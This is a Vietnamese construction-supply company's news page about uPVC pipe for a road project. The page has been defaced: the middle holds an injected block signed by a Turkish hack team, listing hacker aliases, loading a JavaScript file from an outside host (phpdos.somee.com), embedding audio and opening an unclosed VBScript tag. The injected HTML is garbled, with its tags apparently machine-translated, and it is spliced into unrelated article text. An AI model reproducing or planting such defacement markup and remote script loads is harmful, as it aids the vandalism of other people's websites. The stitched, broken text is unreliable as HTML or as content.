CÔNG TY CỔ PHẦN ĐẦU TƯ LOTAS tiếp tục cung cấp ống nhựa uPVC cho công trình " Thi công hào kỹ thuật của dự án đường Tân Sơn Nhất - Bình Lợi - Vành đai ngoài (giai đoạn 2)"

Chủ đầu tư: CÔNG TY GS E&C - HÀN QUỐC

Đơn vị thi công: CÔNG TY CỔ PHẦN ĐIỆN NHẸ VIỄN THÔNG

 
turkhackteam.

<! - XKROSTOS / XKROSTOS Türk Hacked By Hack ->
<> Sube
<Http-equiv = "Content-Language" content = "tr-tr" />
<Http-equiv = "Content-Type" content = "text / html; charset = windows-1252" />
<Title> xKrostos Hacked By </ title>
<Reklam = "Anahtar Kelimeler" content = "TheEos Hacked By" />
<Ad "description" content = "TheEos Hacked By" = />
</> Sube
 
<Bgcolor = Vucut Siyah>
<a> <img src = "http://www.hizliresimyukle.com/images/2014/05/14/ae324646f1.jpg" title = "XkROSTos Hack Team - TheEos" width = 200 "height =" 150 "align = "Doğru"> </a>
<a> <img src = "http://www.hizliresimyukle.com/images/2014/05/14/6d47836024.jpg" title = "TurkHackTeam - TheEos" width = 200 "height =" 150 "= yasla" sol "> <center> <img src =" http://www.hizliresimyukle.com/images/2014/05/14/ae8afd.gif "alt =" TurkHackTeam - TheEos "width =" 700 "height =" 200 "hizalama => </a> </ center> "align"
 
<Merkezi> <b> <font size = "7"> <font color = Beyaz> 2 Hecedir sorun Bazen !!! </ font> </ font> </ b> </ Merkezi>
 
<a> <center> <font color=green><b>-----------------------------------------------------------------------------------------------------------------</b></font></center></a>
 
<Merkezi> <img src = "http://www.hizliresimyukle.com/images/2014/05/14/2f5bd.gif" title = "XkRoStOs Hacked !!!"> </ center> vietnamca
 
<a> <b> <center> <font size = "6"> <font color = red> </ font> <font color = gumus> XKrOsTOS </ font> </ font> </ center> </ Hacked By b> vietnamca </a>
 
<a> <center> <font color=white><b>-------------------------------------------------------------------------------------------------------------------------------</b></font></center></a>
<Merkezi> <font color = red> <b> <i> Bedros Sanches - Elazigli168 - ZoRRoKiN - 3333 - Samuray! - Siyah-Box - gece Kurt </ i> </ b> </ font> </ Merkezi>
<Merkezi> <font color = red> <b> <i> Delphoi - RaxiD - 'Ghost Warrior - Sollo-Türk -XKrOsToS-HAKOPS - uzmaniz - _RoC_ - Siyah-Kral </ i> </ b> </ Yazi> </ center>
<a> <center> <font color=white><b>-------------------------------------------------------------------------------------------------------------------------------</b></font></center></a><br>
 
<Merkezi> <a href="http://www.ipadresi.org"> <img src = "http://in.sitekodlari.com/ipadresi9.php" border = "0" alt = "ip adresiniz"> </ center>
 
********* HTML, VUCUT {imleç: url ("http://www.addcode.net/images/mouse/fireorange.ani"), url ("http://www.addcode.net /images/mouse/fireorange.gif "), otomatik;} </ style> <p align =" right "/>
<Body> <script language = "javascript" src = "http://phpdos.somee.com/sagtus.js"> </ script> </ body> <center>
<EMBED
style = "SINIR-Sag: rgb (11.120.255) 1px solid; SINIR-TOP: rgb (11.120.255) 1px solid; SINIR-SOL: rgb (11.120.255) 1px solid; border-bottom: rgb (11,120. 255) 1px solid; AMAC-RENK: rgb (11.120.255) "
src = http: //www.fileden.com/files/2012/10/19/3358799/TheEos.mp3
width = 173 height = 25 type = audio / x-ms-wma> <BR>
<BR>
<BR>
</ Merkez>
</ Html>
 
<! - TheEos Hacked By / xkrostos hack -> <script Language = VBScript> <! -

Bài mới hơn

Bài cũ hơn

Dự án tiêu biểu
HOTLINE
0913 381 069
Video